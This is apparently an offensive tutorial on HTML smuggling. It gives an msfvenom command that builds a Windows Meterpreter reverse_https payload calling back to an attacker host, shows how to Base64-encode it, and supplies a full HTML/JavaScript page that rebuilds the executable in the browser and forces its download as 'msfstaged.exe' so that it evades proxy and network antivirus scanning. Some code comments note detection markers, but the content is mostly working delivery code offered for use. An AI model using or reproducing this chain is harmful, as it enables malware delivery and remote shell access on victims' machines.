Using a combination of HTML5 and JavaScript to sneak malicious files past content filters is not a new offensive technique. This mechanism has been incorporated into popular offensive frameworks, for example Demiguise and SharpShooter.
HTML smuggling is a file delivery technique that leverages HTML5 and JavaScript to build a file directly in the browser — rather than downloading it from a remote server — and then triggers a download, often without triggering network-based antivirus or proxy protections.
Generate a payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<your_ip> LPORT=443 -f exe -o payload.exe
Convert to Base64:
base64 payload.exe | tr -d '\n'
Then embed the Base64 string in the JavaScript/HTML page below:
<html>
<body>
<script>
function base64ToArrayBuffer(base64) {
  // Decode a Base64 string into raw bytes and return the backing ArrayBuffer.
  // window.atob yields a "binary string" (one character per byte, code points
  // 0-255), so each character code maps directly to one byte. atob throws on
  // malformed Base64 input; that error is left to propagate to the caller.
  const decoded = window.atob(base64);
  const bytes = Uint8Array.from(decoded, (ch) => ch.charCodeAt(0));
  return bytes.buffer;
}
// === Base64 payload here (one-line string) ===
// The file travels inline inside this script as text: no separate file
// request is ever made, which is why (as the description above states)
// network-side file scanning only ever sees this HTML document.
var file = '<BASE64_PAYLOAD>';
// Decode the text back into raw bytes held in browser memory.
var data = base64ToArrayBuffer(file);
// Wrap the bytes as a generic binary Blob for the download APIs below.
var blob = new Blob([data], { type: 'application/octet-stream' });
// Name the browser proposes when the Blob is saved to disk.
var fileName = 'msfstaged.exe';
// === Cross-browser download logic ===
// Detection note: the observable markers of this pattern are an atob() of a
// large inline string literal feeding a Blob, a blob: object URL assigned to
// an anchor carrying the `download` attribute, and the msSaveOrOpenBlob
// fallback. The decoded bytes exist only client-side until the save occurs,
// so browser download policy and endpoint controls, not proxy inspection,
// are the layer where this reaches a file on disk.
if (window.navigator && window.navigator.msSaveOrOpenBlob) {
// For Internet Explorer and older Edge: the vendor API saves the Blob directly.
window.navigator.msSaveOrOpenBlob(blob, fileName);
} else {
// For modern browsers (Chrome, Firefox, new Edge): a hidden anchor with a
// `download` attribute is clicked programmatically. The statement order
// (create object URL, attach anchor, click, revoke) is kept exactly as
// written; NOTE(review): whether click() fires on a detached anchor or after
// revocation varies by browser, so do not reorder these lines casually.
var a = document.createElement('a');
var url = window.URL.createObjectURL(blob);
a.style = 'display: none';
a.href = url;
a.download = fileName;
document.body.appendChild(a);
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>